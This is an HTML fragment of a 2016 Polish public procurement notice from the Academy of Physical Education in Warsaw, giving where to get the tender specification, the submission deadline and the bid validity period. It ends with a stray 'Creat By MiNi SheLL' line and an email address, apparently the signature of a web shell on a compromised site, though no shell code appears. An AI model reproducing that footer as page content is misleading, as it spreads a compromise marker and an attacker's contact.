<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.awf.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Wychowania Fizycznego Józefa Piłsudskiego w Warszawie
		ul. Marymoncka 34,
		00-968 Warszawa 
		Samodzielna Sekcja  Zamówień Publicznych, budynek administracji - parter.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2016 godzina 12:00, miejsce: Akademia Wychowania Fizycznego Józefa Piłsudskiego w Warszawie
		ul. Marymoncka 34,
		00-968 Warszawa 
		Samodzielna Sekcja  Zamówień Publicznych, budynek administracji - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com